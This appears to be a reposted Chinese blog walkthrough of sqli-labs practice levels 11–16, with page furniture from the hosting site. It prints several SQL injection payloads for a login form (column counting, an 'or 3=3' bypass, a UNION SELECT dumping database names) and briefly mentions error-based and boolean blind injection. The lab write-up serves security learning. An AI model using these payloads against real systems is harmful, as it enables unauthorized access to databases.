码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs靶场11-16关

时间:2020-01-11 21:59:19      阅读:119      评论:0      收藏:0      [点我收藏+]

标签:发送   pass   bsp   inf   htm   select   rom   union   www   

写的可能不太详细,详细请看https://www.cnblogs.com/-qing-/p/11610385.html#_lab2_0_0

友情提醒:发送数据请求不要乱加空格,否则结果可能显示不出来

十一关

uname=admin‘ order by 2#&passwd=1&submit=Submit //判断列数

技术图片

uname=admin or 3=3 #&passwd=1&submit=Submit

技术图片

uname=-qing‘ union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit//爆全部数据

技术图片

 

 十二关

只是与上一关的闭合符号有区别

技术图片

 

 技术图片

 

 技术图片

 

 十三关

看源码之后知道他是注释符号

技术图片

 

 技术图片

 

 技术图片

 

 得不出数据来,直接用报错函数来做

技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 十四关  与上一关的区别就是闭合符号,不多说了

技术图片

 

 十五关  单引号闭合的布尔盲注

技术图片

 

 技术图片

 

 十六关  闭合符号的区别

技术图片

 

 技术图片

sqli-labs靶场11-16关

标签:发送   pass   bsp   inf   htm   select   rom   union   www   

原文地址:https://www.cnblogs.com/zhao-yang/p/12181177.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!